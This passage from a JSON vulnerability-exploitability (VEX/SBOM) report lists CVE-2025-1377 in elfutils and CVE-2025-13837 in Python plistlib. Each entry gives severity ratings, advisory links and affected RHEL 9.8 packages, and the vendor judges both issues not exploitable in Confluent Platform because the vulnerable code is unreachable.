          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-1377",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        404
      ],
      "description": "A vulnerability, which was classified as problematic, has been found in GNU elfutils 0.192. This issue affects the function gelf_getsymshndx of the file strip.c of the component eu-strip. The manipulation leads to denial of service. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of the patch is fbf1df9ca286de3323ae541973b08449f8d03aba. It is recommended to apply a patch to fix this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-1377"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-1377"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1377"
        },
        {
          "url": "https://sourceware.org/bugzilla/attachment.cgi?id=15941"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=32673"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=32673#c2"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7369-1"
        },
        {
          "url": "https://vuldb.com/?ctiid.295985"
        },
        {
          "url": "https://vuldb.com/?id.295985"
        },
        {
          "url": "https://vuldb.com/?submit.497539"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-1377"
        },
        {
          "url": "https://www.gnu.org/"
        }
      ],
      "published": "2025-02-17T05:15:10+00:00",
      "updated": "2026-06-17T08:39:01+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "0.194-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "0.194-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "0.194-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-13837",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        400
      ],
      "description": "When loading a plist file, the plistlib module reads data in size specified by the file itself, meaning a malicious file can cause OOM and DoS issues",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-13837"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:10950"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19177"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-13837"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-19177.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:10950"
        },
        {
          "url": "https://github.com/python/cpython/commit/568342cfc8f002d9a15f30238f26b9d2e0e79036"
        },
        {
          "url": "https://github.com/python/cpython/commit/5a8b19677d818fb41ee55f310233772e15aa1a2b"
        },
        {
          "url": "https://github.com/python/cpython/commit/694922cf40aa3a28f898b5f5ee08b71b4922df70"
        },
        {
          "url": "https://github.com/python/cpython/commit/71fa8eb8233b37f16c88b6e3e583b461b205d1ba"
        },
        {
          "url": "https://github.com/python/cpython/commit/b64441e4852383645af5b435411a6f849dd1b4cb"
        },
        {
          "url": "https://github.com/python/cpython/commit/cefee7d118a26ef6cd43db59bb9d98ca9a331111"
        },
        {
          "url": "https://github.com/python/cpython/issues/119342"
        },
        {
          "url": "https://github.com/python/cpython/pull/119343"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-13837.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19177.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/2X5IBCJXRQAZ5PSERLHMSJFBHFR3QM2C/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13837"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8018-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-13837"
        }
      ],
      "published": "2025-12-01T18:16:04+00:00",
      "updated": "2026-06-17T08:34:50+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
